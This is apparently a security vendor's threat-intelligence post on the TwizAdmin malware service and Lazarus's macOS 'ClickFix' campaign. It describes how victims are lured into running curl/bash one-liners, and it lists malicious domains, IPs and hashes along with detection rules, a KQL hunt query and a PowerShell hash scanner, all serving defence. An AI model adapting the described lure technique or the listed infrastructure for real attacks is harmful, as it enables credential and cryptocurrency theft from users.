Back to Intelligence

TwizAdmin RaaS & Lazarus Mach-O Man: OTX Pulse Analysis — Multi-Stage Crypto Theft & macOS ClickFix

SA
Security Arsenal Team
May 24, 2026
5 min read

Recent OTX Pulse data reveals a dangerous convergence of financially motivated Malware-as-a-Service (MaaS) operations and state-sponsored espionage activity. The DataBreachPlus group is actively pushing the TwizAdmin framework, a sophisticated multi-stage malware suite featuring crypto-clipping (targeting 8 chains), BIP-39 seed phrase theft, and a crpx0 ransomware module managed via a FastAPI C2 panel.

Simultaneously, the Lazarus Group has escalated campaigns against macOS users with the "Mach-O Man" toolkit. Utilizing a ClickFix social engineering vector—fake meeting invitations delivered via Telegram—Lazarus is tricking victims into running terminal commands that install the PyLangGhostRAT. This coincides with a massive expansion of hostile infrastructure in the Middle East, where over 1,350 C2 servers have been mapped across 98 providers, with STC (Saudi Arabia) hosting the majority of the command nodes supporting actors like APT28 and Energetic Bear.

Threat Actor / Malware Profile

DataBreachPlus / TwizAdmin

  • Type: Malware-as-a-Service (MaaS)
  • Distribution: Phishing campaigns mimicking logistics (e.g., FedEx) to deliver initial payloads.
  • Capabilities: Multi-platform (Windows/macOS). Features a clipboard hijacker for cryptocurrency theft, browser credential stealer, and a modular ransomware component (crpx0).
  • C2: FastAPI-based panel with a license key system, accessible via specific ports (e.g., 1337).

Lazarus Group / Mach-O Man

  • Type: Nation-State APT
  • Distribution: "ClickFix" attacks via Telegram. Victims receive fake collaboration links (Zoom/Teams) and are manipulated into executing a curl/bash one-liner in the terminal.
  • Capabilities: The "Mach-O Man" kit deploys PyLangGhostRAT, focusing on stealing browser data, cookies, and credentials. It utilizes Telegram for data exfiltration.
  • Targeting: Specifically aimed at Finance and Technology sectors leveraging macOS.

Regional Infrastructure (Middle East)

  • Actors: Eagle Werewolf, Energetic Bear, APT28, GrayCharlie.
  • Infrastructure: Massive utilization of residential and hosting providers. STC (Saudi Telecom) is a critical hub, hosting 72.4% of detected C2 servers. Infrastructure supports payloads ranging from Cobalt Strike to Mirai botnets.

IOC Analysis

The provided indicators of compromise (IOCs) require immediate triage:

  • Domains (fanonlyatn.xyz, livemicrosft.com): These serve as payload distribution points and C2 gateways. livemicrosft.com is a classic typo-squatting technique used in the Lazarus ClickFix campaign.
  • File Hashes (SHA256): Numerous hashes relate to the TwizAdmin droppers, the Mach-O Man binaries, and the crpx0 ransomware payload. These must be blocked on endpoints and added to EDR denylists.
  • IPv4 Addresses: A list of Middle Eastern IPs (e.g., 37.32.15.8) linked to active C2 servers for various RATs (AsyncRAT, Sliver).

Operationalization: SOC teams should ingest these IOCs into SIEM correlation engines and EDR systems immediately. Focus on network egress alerts connecting to these specific IPs and domains.

Detection Engineering

YAML
title: Potential TwizAdmin FastAPI C2 Check-in
description: Detects potential network connection to TwizAdmin C2 infrastructure characterized by specific user-agent or path patterns often seen with FastAPI panels.
references:
  - https://intel.breakglass.tech/post/twizadmin-103-241-66
author: Security Arsenal
date: 2026/05/24
modified: 2026/05/24
tags:
  - attack.c2
  - attack.command_and_control
logsource:
  category: proxy
detection:
  selection:
    c-uri|contains:
      - '/api/v1/'
      - '/license'
    c-uri|contains:
      - 'fanonlyatn.xyz'
  condition: selection
falsepositives:
  - Legitimate API traffic to whitelisted domains
level: high
---
title: Lazarus Group macOS ClickFix Execution Pattern
description: Detects the execution of suspicious commands via Terminal often seen in ClickFix attacks (curl | bash) targeting macOS.
references:
  - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
author: Security Arsenal
date: 2026/05/24
tags:
  - attack.execution
  - attack.user_execution
logsource:
  category: process_creation
  product: macos
detection:
  selection_img:
    Image|endswith:
      - '/bin/bash'
      - '/bin/sh'
      - '/bin/zsh'
  selection_cli:
    CommandLine|contains:
      - 'curl '
      - 'wget '
    CommandLine|contains:
      - ' | '
      - ' > '
  condition: all of selection_*
falsepositives:
  - Administrative script execution
level: high
---
title: Suspicious Mach-O Binary Creation in User Directory
description: Detects creation of Mach-O binaries in temporary or user download directories, indicative of Mach-O Man malware deployment.
references:
  - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
author: Security Arsenal
date: 2026/05/24
tags:
  - attack.defense_evasion
  - attack.initial_access
logsource:
  category: file_creation
  product: macos
detection:
  selection:
    TargetFilename|contains:
      - '/Downloads/'
      - '/tmp/'
    TargetFilename|endswith:
      - '.app'
      - '.dmg'
  filter:
    Image|contains:
      - '/Installer.app/'
      - '/Software Update'
  condition: selection and not filter
level: medium



kql
// Hunt for TwizAdmin and Lazarus Mach-O Man Network Indicators
// Look for connections to known malicious domains and Middle East C2 IPs
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "fanonlyatn.xyz",
    "livemicrosft.com"
)
or RemoteIP in (
    "37.32.15.8",
    "197.51.170.131",
    "5.109.182.231",
    "93.113.62.247",
    "94.252.245.193"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend ThreatIntel = "OTX Pulse TwizAdmin/Lazarus"



powershell
<#
.SYNOPSIS
    IOC Hunt Script for TwizAdmin and Mach-O Man Hashes
.DESCRIPTION
    Scans the file system for specific SHA256 hashes associated with the active campaigns.
#>

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
    "85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
    "871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
    "89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
    "a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
)

Write-Host "Starting IOC Hunt for TwizAdmin/Mach-O Man Hashes..." -ForegroundColor Cyan

$DrivesToScan = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Hash in $TargetHashes) {
    Write-Host "Scanning for Hash: $Hash" -ForegroundColor Yellow
    foreach ($Drive in $DrivesToScan) {
        try {
            Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
            ForEach-Object {
                $FilePath = $_.FullName
                try {
                    $FileHash = (Get-FileHash -Path $FilePath -Algorithm SHA256 -ErrorAction Stop).Hash
                    if ($FileHash -eq $Hash) {
                        Write-Host "[MATCH] Malicious file found: $FilePath" -ForegroundColor Red
                    }
                } catch {
                    # Ignore errors for locked files or access denied
                }
            }
        } catch {
            # Ignore drive access errors
        }
    }
}
Write-Host "Scan Complete." -ForegroundColor Green

Response Priorities

  • Immediate: Block all listed domains and IP addresses at the perimeter firewall and proxy. Quarantine any endpoints matching the provided file hashes.
  • 24h: Initiate credential resets for users who may have interacted with "FedEx" themed lures or fake meeting invites. Hunt for persistence mechanisms associated with FastAPI panels and LaunchAgents referencing Mach-O binaries.
  • 1 Week: Conduct security awareness training focused on identifying "ClickFix" attacks (browser popups asking for terminal commands). Review egress traffic policies specifically for connections to Saudi Arabia-based IP ranges (STC) unless business justified.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-apttwizadminlazarus-groupmach-o-manclickfixcrpx0

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action